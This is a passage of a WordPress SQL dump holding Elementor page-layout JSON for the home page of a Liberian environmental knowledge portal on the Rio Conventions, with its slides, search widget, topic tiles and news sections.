itle\":\"Start Contributing to the EKMS\",\"description\":\"<p>Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?<\\/p>\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(26981,3928,'_elementor_version','2.7.5'),(26982,3928,'_elementor_template_type','wp-page'),(26983,3928,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(26984,3929,'_wp_page_template','default'),(26985,3929,'_elementor_edit_mode','builder'),(26986,3929,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}]},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\"}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\"}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\"}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(26987,3929,'_elementor_version','2.7.5'),(26988,3929,'_elementor_template_type','wp-page'),(26989,3929,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(26991,9,'_elementor_pro_version','3.7.7'),(26994,3930,'_wp_page_template','default'),(26995,3930,'_elementor_edit_mode','builder'),(26996,3930,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}]},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by 